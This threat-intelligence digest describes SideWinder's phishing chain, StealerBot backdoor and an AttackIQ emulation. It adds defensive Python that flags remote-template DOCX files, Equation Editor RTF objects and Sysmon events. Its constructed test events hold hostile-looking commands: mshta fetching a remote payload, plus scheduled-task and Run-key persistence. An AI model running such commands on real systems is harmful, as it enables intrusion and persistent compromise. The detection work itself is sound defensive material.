Emulating the Espionage-Oriented Group SideWinder

SideWinder, active since at least 2012, conducts targeted cyber-espionage against military, government, and maritime organizations across the Indian Ocean and Mediterranean regions. Initial access relies on spear-phishing with malicious Office documents that exploit CVE-2017-0199 and CVE-2017-11882 to deliver StealerBot, a modular backdoor that runs entirely in memory. AttackIQ has released an attack graph that emulates SideWinder's behaviors, together with sample hashes and test scenarios, so that organizations can validate their detection and prevention controls against them.

Keypoints

  • SideWinder targets military, government, ports, and maritime facilities across countries including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
  • Initial access is via spear-phishing Office documents: a .DOCX uses remote template injection (CVE-2017-0199) to fetch an .RTF, and that .RTF carries shellcode that exploits CVE-2017-11882 in the Equation Editor component.
  • The shellcode performs environment checks to evade analysis and then downloads a small JavaScript payload which retrieves further stages from short-lived, rotated infrastructure.
  • Delivery infrastructure uses geofencing, ephemeral URLs, and on-the-fly payload generation so each download yields a unique hash, complicating static detection and correlation.
  • The final payload, StealerBot, is a modular, memory-resident backdoor with components injected and operated in memory to avoid disk artifacts.
  • AttackIQ published an emulation (attack graph) that reproduces SideWinder TTPs to help assess and validate security controls and incident response processes.
  • Multiple test samples and SHA256 hashes are provided to evaluate network and endpoint controls, including .DOCX, .RTF, a backdoor loader DLL, and an unencrypted StealerBot sample.
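As an added example (not code from AttackIQ or from the article), two small Python checks for the two document types the emulation uses: one inspects a .DOCX for an attachedTemplate relationship that points at a remote location, which is what remote template injection looks like on disk, and the other is a heuristic for an .RTF that embeds an Equation Editor object, the component CVE-2017-11882 targets. Every sample document, URL and marker here is constructed for illustration and does not reproduce the SideWinder samples listed in the article.

```python
"""
Added triage helpers for the delivery documents described above.

docx_remote_templates() opens a .DOCX and reports attachedTemplate
relationships that point at a remote (HTTP/HTTPS/UNC) location.
rtf_has_equation_object() is a heuristic for an .RTF that embeds an
Equation Editor 3.0 object.  All sample documents are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Equation Editor 3.0 markers as they appear in an RTF once whitespace is
# stripped and the text is lower-cased: the ProgID in \objclass, the same
# ProgID hex-encoded inside \objdata (OLE1 class-name field), and the CLSID
# {0002CE02-0000-0000-C000-000000000046} as stored little-endian in an OLE stream.
EQNEDT_MARKERS = (
    b"equation.3",
    b"Equation.3".hex().encode(),
    b"02ce020000000000c000000000000046",
)


def _is_remote(target):
    t = (target or "").lower()
    return t.startswith(("http://", "https://")) or t.startswith("\\\\")


def docx_remote_templates(docx_bytes):
    """Return the remote attachedTemplate targets of a DOCX (empty if none)."""
    rels_name = "word/_rels/settings.xml.rels"
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if rels_name not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(rels_name))
    return [
        rel.get("Target", "")
        for rel in root.iter(f"{{{REL_NS}}}Relationship")
        if rel.get("Type") == ATTACHED_TEMPLATE
        and rel.get("TargetMode") == "External"
        and _is_remote(rel.get("Target"))
    ]


def rtf_has_equation_object(rtf_bytes):
    """Heuristic: does this RTF carry an embedded Equation Editor object?"""
    if not rtf_bytes.lstrip().startswith(b"{\\rtf"):
        return False
    # \objdata hex is usually wrapped across lines, so strip whitespace first.
    body = re.sub(rb"\s+", b"", rtf_bytes).lower()
    return any(marker in body for marker in EQNEDT_MARKERS)


def build_docx(template_target=None):
    """Construct a minimal DOCX, optionally with an external attachedTemplate."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if template_target is not None:
            zf.writestr(
                "word/_rels/settings.xml.rels",
                f'<Relationships xmlns="{REL_NS}">'
                f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                f'Target="{template_target}" TargetMode="External"/>'
                "</Relationships>",
            )
    return buf.getvalue()


# Constructed RTF samples (not real malware): one declaring the object via
# \objclass, one where only the hex-encoded OLE1 class name survives, and
# one benign document.
RTF_OBJCLASS = (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
                b"{\\*\\objdata 0105000002000000}}\\par}")
RTF_HEX_ONLY = (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 01050000 02000000\n"
                b"0b000000 4571756174 696F6E2E33 00}}\\par}")
RTF_BENIGN = b"{\\rtf1\\ansi{\\fonttbl{\\f0 Calibri;}}\\f0 Quarterly report\\par}"

if __name__ == "__main__":
    print(docx_remote_templates(build_docx("https://example.invalid/t.dotm")))
    for name, sample in (("objclass", RTF_OBJCLASS), ("hex", RTF_HEX_ONLY),
                         ("benign", RTF_BENIGN)):
        print(name, rtf_has_equation_object(sample))
```

The DOCX check is a file-format fact, not a heuristic: a legitimate document may reference a local template, but an external attachedTemplate over HTTP or a UNC share is the construct the keypoints describe. The RTF check is deliberately loose and will miss obfuscated objects (e.g. an `\objclass` that is split or an `\objdata` blob with junk interleaved), which is why it is a triage aid rather than a detection rule.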

MITRE Techniques

  • [T1105] Ingress Tool Transfer – Downloaded malicious .DOCX, .RTF and loader samples to the host (“The SideWinder .DOCX Sample … is downloaded to memory and saved to disk”).
  • [T1218.005] Signed Binary Proxy Execution: Mshta – Dropped payload executed through mshta.exe (“…rtf file is dropped and executed via mshta.exe”).
  • [T1082] System Information Discovery – GlobalMemoryStatusEx API call used to gather physical and virtual memory information (“…system memory is checked via GlobalMemoryStatusEx”).
  • [T1518.001] Security Software Discovery – WMIC query to enumerate installed antivirus products (“WMIC is executed to retrieve the list of antivirus products installed on the system”).
  • [T1202] Indirect Command Execution – Abuse of pcalua.exe to execute a payload (“…a payload is executed using pcalua.exe”).
  • [T1053.005] Scheduled Task – Persistence via creation of scheduled tasks using schtasks (“This scenario creates a new scheduled task for persistence using the schtasks utility”).
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence via Run/RunOnce registry keys (“creates an entry under the HKLM…Run registry key to be run at system startup”).
  • [T1574.002] DLL Side-Loading – Leveraging a legitimate executable to load a malicious DLL (“This scenario leverages a legitimate and trusted executable to load a malicious Dynamic-link Library (DLL)”).
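As an added example, not part of AttackIQ's attack graph, the following Python turns the behaviors listed above into simple rules over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) events, so the emulation's output can be checked against what the endpoint telemetry actually records. The JSON event lines, file paths, and the DLL watchlist are constructed for the example; only the vsstrace.dll file name comes from the page.

```python
"""
Added rule-based triage of constructed Sysmon-style events (JSON, one per
line) for the behaviours listed under MITRE Techniques.  Field names follow
Sysmon Event ID 1 (process create) and Event ID 7 (image load); the event
lines are constructed, not captured from a real host.
"""
import json
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_WATCHLIST = {"vsstrace.dll"}   # loader DLL name from the page; extend as needed


def _base(path):
    return ntpath.basename(path or "").lower()


def _cmd(ev):
    return ev.get("CommandLine", "").lower()


def _rule_mshta_remote(ev):       # T1218.005: mshta fetching a remote payload
    return _base(ev.get("Image")) == "mshta.exe" and ("http://" in _cmd(ev) or "https://" in _cmd(ev))


def _rule_wmic_av(ev):            # T1518.001: WMIC AntiVirusProduct enumeration
    return _base(ev.get("Image")) == "wmic.exe" and "antivirusproduct" in _cmd(ev)


def _rule_pcalua(ev):             # T1202: pcalua.exe -a <payload>
    return _base(ev.get("Image")) == "pcalua.exe" and " -a " in _cmd(ev)


def _rule_schtasks(ev):           # T1053.005: schtasks /create
    return _base(ev.get("Image")) == "schtasks.exe" and "/create" in _cmd(ev)


def _rule_runkey(ev):             # T1547.001: reg add ...\CurrentVersion\Run(Once)
    return _base(ev.get("Image")) == "reg.exe" and " add " in _cmd(ev) and "\\currentversion\\run" in _cmd(ev)


def _rule_sideload(ev):           # T1574.002: watchlisted DLL loaded outside the system dirs
    loaded = ev.get("ImageLoaded", "")
    return _base(loaded) in SIDELOAD_WATCHLIST and not loaded.lower().startswith(SYSTEM_DIRS)


# (Sysmon EventID the rule applies to, technique, description, predicate)
RULES = [
    (1, "T1218.005", "mshta.exe launched with a remote URL", _rule_mshta_remote),
    (1, "T1518.001", "WMIC AntiVirusProduct query", _rule_wmic_av),
    (1, "T1202", "pcalua.exe used to launch a payload", _rule_pcalua),
    (1, "T1053.005", "scheduled task created with schtasks", _rule_schtasks),
    (1, "T1547.001", "Run key written with reg.exe", _rule_runkey),
    (7, "T1574.002", "watchlisted DLL loaded from outside System32/SysWOW64", _rule_sideload),
]


def detect(lines):
    """Return (technique, description, image) for every rule hit, in log order."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for event_id, technique, desc, pred in RULES:
            if ev.get("EventID") == event_id and pred(ev):
                hits.append((technique, desc, ev.get("Image")))
    return hits


# Constructed events: six that should fire and two benign ones that should not.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "mshta.exe https://example.invalid/stage2.hta"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\pcalua.exe",
     "CommandLine": "pcalua.exe -a C:\\Users\\Public\\update.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": "schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\Users\\Public\\update.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\update.exe"},
    {"EventID": 7, "Image": "C:\\Users\\Public\\legit.exe",
     "ImageLoaded": "C:\\Users\\Public\\vsstrace.dll", "Signed": "false"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe",
     "ImageLoaded": "C:\\Windows\\System32\\vsstrace.dll", "Signed": "true"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]]

if __name__ == "__main__":
    for technique, desc, image in detect(SAMPLE_EVENTS):
        print(f"{technique:10} {desc:55} {image}")
```

The rules are intentionally narrow: they match the specific command lines the scenarios use, so they are a starting point for confirming the emulation was seen, not a replacement for a tuned detection set. The side-loading rule in particular keys only on the DLL name and load path; in production you would also check the signature state and the loading process's own path.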

Indicators of Compromise

  • [File Hash] Known sample hashes provided for testing – 57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d (.DOCX), d9e373aeea5fe0c744f0de94fdd366b5b6da816209ac394cbbda1c64c03b50b1 (.RTF)
  • [File Hash] Backdoor and loader samples – 44ff1117bb0167f85d599236892deede636c358df3d8908582a6ce6a48070bd4 (vsstrace.dll loader). The article also provides an unencrypted StealerBot sample; its hash is not reproduced here because the value carried in this digest repeats the .RTF hash above, so take it from the original article.
  • [File Name] Malicious document and loader filenames used in scenarios – .DOCX sample, .RTF sample, vsstrace.dll (loader)
  • [Network] Delivery infrastructure characteristics – short-lived/rotated URLs and geofenced servers that return an empty RTF to non-targets (no specific domains listed in the article)


Read more: https://www.attackiq.com/2025/11/13/emulating-sidewinder/